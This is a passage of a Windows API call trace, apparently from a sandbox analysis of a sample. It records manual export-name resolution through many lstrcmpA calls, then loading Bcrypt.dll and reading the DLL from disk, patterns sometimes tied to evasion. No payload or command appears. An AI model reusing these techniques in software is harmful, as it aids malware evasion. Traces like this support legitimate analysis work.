lpString2="CDefFolderMenu_Create2") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.463] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0288.463] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0288.464] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0288.464] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0288.464] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0288.465] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.466] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0288.467] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0288.468] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0288.469] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0288.470] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0288.470] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0288.471] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0288.471] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0288.471] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0288.471] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0288.472] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0288.473] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0288.663] GetProcessHeap () returned 0x540000 [0288.663] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x410c040 | out: hHeap=0x540000) returned 1 [0289.134] GetProcessHeap () returned 0x540000 [0289.134] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559340 [0289.135] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0289.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.264] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.264] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0289.264] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0289.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.265] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0289.265] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0289.265] GetProcessHeap () returned 0x540000 [0289.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x26fa0) returned 0x2d42010 [0289.267] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.267] ReadFile (in: hFile=0x15c, lpBuffer=0x2d42010, 